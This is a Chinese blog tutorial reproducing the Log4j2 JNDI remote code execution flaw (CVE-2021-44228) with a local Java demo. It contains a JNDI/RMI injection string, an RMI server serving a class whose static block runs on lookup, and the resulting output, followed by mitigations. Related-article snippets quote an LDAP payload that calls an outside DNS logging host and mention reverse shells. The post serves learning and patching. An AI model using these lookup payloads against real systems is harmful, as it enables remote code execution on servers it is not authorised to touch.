Apache Log4j2远程代码执行漏洞复现

最新推荐文章于 2024-05-21 09:10:26 发布
最新推荐文章于 2024-05-21 09:10:26 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: 日志 文章标签: apache java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lify2011/article/details/121885353
版权

TOApache Log4j2远程代码执行漏洞复现

漏洞原理

log4j2版本 < log4j-2.15.0 可由JNDI/rmi注入实现远程代码执行。
影响版本Log4j2.x<=2.14.1漏洞复现
漏洞原理的分析:

创建复现工程demo

引入log4j 的jar包

版本在log4j 2.0~2.14.1范围里,demo中引入的版本是2.13.3,如下:

org.apache.logging.log4j
log4j-core
2.13.3

编写测试用例和jndi/rmi远程服务

1.log4j2 测试用例
package com.example.demo.log4j2;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * @author lify
 * @version 1.0
 * @className Log4j2Test
 * <p>
 * TODO
 * @date 2021/12/10.
 */
public class Log4j2Test {
    private static Logger logger = LogManager.getLogger(Log4j2Test.class);

    public static void main(String[] args) {
//        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
//        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
        String name = "${java:vm}";
//        name = "${java:version}";
        name = "${java:os}";
        logger.error("hello,{}", name);

        name = "${jndi:rmi://127.0.0.1:8080/rmiExecute}";//# 黑客端的一个jdni的服务地址
        logger.error("hello,{}", name);
    }
}
2.远程rmi执行的服务
rmi服务
package com.example.demo.rmi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;

/**
 * @author lify
 * @version 1.0
 * @className RmiServer
 * <p>
 * log4j2远程执行漏洞复现:rmi远程服务server
 * @date 2021/12/12.
 */
public class RmiServer {

    public static void main(String[] args) {
        try {
            Registry registry = LocateRegistry.createRegistry(8080);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(new Reference("com.example.demo.rmi.RmiExecute", "com.example.demo.rmi.RmiExecute", null));
            registry.bind("rmiExecute", referenceWrapper);
            System.out.println("rmi Server 'rmiExecute/8080' Started!\n");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

具体执行[模拟输出一句话‘触发执行黑客的服务…’]

package com.example.demo.rmi;

/**
 * @author lify
 * @version 1.0
 * @className RmiExecute
 * <p>
 * 模拟远程黑客端执行
 * @date 2021/12/12.
 */
public class RmiExecute {
    static {
        System.out.println("触发执行黑客的服务.....");
    }
}

注意事项:
1.远程rmi服务的名称rmiExecute和端口号8080,在Log4j2Test的测试中需要一致;
2.如果以上执行不成功,可以在Log4j2Test放开:

System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
System.setProperty("java.rmi.server.useCodebaseOnly", "false");

漏洞复现

启动RmiServer服务;
执行Log4j2Test.main,执行结果如下:

Connected to the target VM, address: '127.0.0.1:50415', transport: 'socket'
12:37:15.687 [main] ERROR com.example.demo.log4j2.Log4j2Test - hello,Mac OS X 10.16 unknown, architecture: x86_64-64
触发执行黑客的服务.....
12:37:15.695 [main] ERROR com.example.demo.log4j2.Log4j2Test - hello,${jndi:rmi://127.0.0.1:8080/rmiExecute}
Disconnected from the target VM, address: '127.0.0.1:50415', transport: 'socket'

Process finished with exit code 0

如下图

在这里插入图片描述
rmi远程服务的代码已经在log4j2的日志输出时执行了;
是不是挺可怕的?!!! 赶紧去验证一下伙伴们负责的系统是不是中招了呢。

漏洞解决办法

1.临时处理办法:

(1). jvm参数 -Dlog4j2.formatMsgNoLookups=true
(2). log4j2.formatMsgNoLookups=True
(3).系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true

2.升级log4j2版本

Log4j 官方非常重视该漏洞,目前已经发布了最新版本解决了该漏洞,使用log4j-2.15.0即可;经过测试,2.15.0版本已经不能执行远程服务了,如下图:
在这里插入图片描述
伙伴们放心升级吧!

lify365
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2595
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)
qq_44433172的博客
06-24 1245
Apache Log4j 远程代码执行漏洞 (CVE-2021-44228)
Apache log4j2远程代码执行漏洞
最新发布
持 开源思想,撰 必胜所学,望 勤学者,无难处
05-21 166
该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。2、若项目使用Maven打包,查看项目pom文件是否存在groupId包含log4j的依赖。1、检查Java应用是否引入log4j-api,log4j-core两个jar。1、官方已于2021年12月10日发布新版本修复该漏洞,请尽快升级至安全版本。
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6394
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
复现Apache Log4j2 远程代码执行漏洞
趣学程序
12-14 867
Apache Log4j2 远程代码执行漏洞 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞影响版本: 2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 复现 仅个人学习总结 效果 MyServer.java package server;
Log4j2 远程代码执行漏洞(cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6143
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Log4J2远程代码执行漏洞修复20211210.rar
12-13
Log4J2远程代码执行漏洞修复详解》 在IT安全领域,Log4J2远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Log4j2远程代码执行漏洞分析及例子
qq_38008721的博客
12-11 1352
0x00 介绍 Log4j2Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告(莫羽师傅挖到的) 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}"); } POC虽然简单,但是
最新log4j2 远程代码执行漏洞(紧急扩散)
猿小白的博客
12-10 6438
一、问题描述 在12月9日晚间出现了Apache Log4j2 远程代码执行漏洞攻击代码。该漏洞利用无需特殊配置,经多方验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。Apache Log4j2是一款流行的Java日志框架,建议广大交易所、钱包、DeFi项目方抓紧自查是否受漏洞影响,并尽快升级新版本。 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被..
Apache Log4j 远程代码执行漏洞分析
告白的博客
12-10 5731
0x00 漏洞描述 apache log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响 Apache Log4j组件描述: Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架
Apache Log4j2 远程代码执行漏洞分析
小小猪的博客
12-20 291
Apache Log4j2 远程代码执行漏洞分析 漏洞简介: ApacheLog4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本为2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 .
Log4j2远程命令执行复现
yzl_007的博客
12-12 3897
Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell 一、漏洞环境 环境是http://vulfocus.fofa.so平台的 二、漏洞验证 启动环境后访问 抓包,修改请求为post 在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslog平台 三、反弹shell 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload 可以在这里
Apache Log4j2 远程代码执行漏洞
qq_39912230的博客
12-13 3902
· 漏洞描述 Apache Log4j2是一款非常优秀的Java日志框架,在各大Java项目中广泛应用。12月9日,Apache官方发布了紧急安全更新,修复了Apache Log4j2中发现的远程代码执行漏洞。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。漏洞风险评级为严重。 ·影响版本 Apache Log4j
log4j2远程代码执行漏洞复现
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 1577
漏洞曝出,因为从来就没有了解过jndi,所以花了有一天时间才搞出。 以下是简单教程。 1.pom.xml </dependency> <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core --> <dependency> <groupId>org.apache.logging.log4j</groupI.
log4j2远程代码执行漏洞学习总结
heheyixiao233的博客
01-01 3394
log4j2远程代码执行漏洞学习总结 背景 近期log4j2漏洞闹得沸沸扬扬,在工作之余也是找了一些资料看一下相关的内容,到现在网上的总结已经很全了,B站上有各种漏洞复现,各大博客类网站关于JNDI相关漏洞又重新被翻了出来,我这里主要是做一些我自己的总结和理解,以及我个人对漏洞复现,当然很多内容包括整个实验流程很多都是从网上复制的,虽然是个缝合怪,但实验的代码和总结是自己的,不会像网上某些文章,无脑CV过来,有的还不全。在文章最后会给出我看到的比较好的各种资料。 不过江湖惯例,警告还是要放的 中华人民
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值